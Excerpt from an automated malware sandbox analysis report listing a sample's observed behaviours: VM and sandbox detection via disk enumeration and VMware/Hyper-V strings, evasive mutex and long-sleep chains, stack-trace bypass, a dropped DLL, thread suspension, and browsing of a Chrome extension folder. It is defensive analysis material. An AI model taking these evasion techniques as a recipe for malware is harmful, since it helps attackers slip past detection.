Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\icgfugf	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

20_2_02CA3862

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_22-890

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: aspnet_compiler.exe, 0000000D.00000002.2020078270.000000000099B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Users\user\AppData\Roaming\icgfugf	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Memory allocated: 29C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Memory allocated: 49C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Memory allocated: B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\icgfugf	Memory allocated: 2700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\icgfugf	Memory allocated: 24A0000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 20_2_02CA16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

20_2_02CA16C7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7145	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2427	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4416	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5396	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 462	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4519	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 868	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2362	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 857	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep count: 7145 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep count: 2427 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3428	Thread sleep count: 462 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5444	Thread sleep count: 4519 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5444	Thread sleep time: -451900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3684	Thread sleep count: 868 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3684	Thread sleep time: -86800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5444	Thread sleep count: 2362 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5444	Thread sleep time: -236200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf TID: 7208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7928	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7964	Thread sleep count: 73 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 7964	Thread sleep time: -73000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7904	Thread sleep count: 88 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 7904	Thread sleep time: -88000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7744	Thread sleep count: 81 > 30
Source: C:\Windows\explorer.exe TID: 7744	Thread sleep time: -81000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7560	Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 7560	Thread sleep time: -52000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6120	Thread sleep count: 71 > 30
Source: C:\Windows\explorer.exe TID: 6120	Thread sleep time: -71000s >= -30000s
Source: C:\Users\user\AppData\Roaming\icgfugf TID: 2496	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02792B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	17_2_02792B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02793ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	17_2_02793ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02791D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	17_2_02791D4A
Source: C:\Windows\explorer.exe	Code function: 18_2_001930A8 FindFirstFileW,FindNextFileW,FindClose,	18_2_001930A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F5255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	19_2_02F5255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	20_2_02CA14D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	20_2_02CA13FE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	20_2_02CA15BE
Source: C:\Windows\explorer.exe	Code function: 21_2_005D1EB4 FindFirstFileW,FindNextFileW,FindClose,	21_2_005D1EB4
Source: C:\Windows\explorer.exe	Code function: 21_2_005D1DB0 FindFirstFileW,FindNextFileW,FindClose,	21_2_005D1DB0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02796512 GetSystemInfo,

17_2_02796512

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: explorer.exe, 0000000E.00000000.2000536859.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000011.00000002.2249471749.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000004.00000002.1767676409.00000000081F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWz
Source: explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
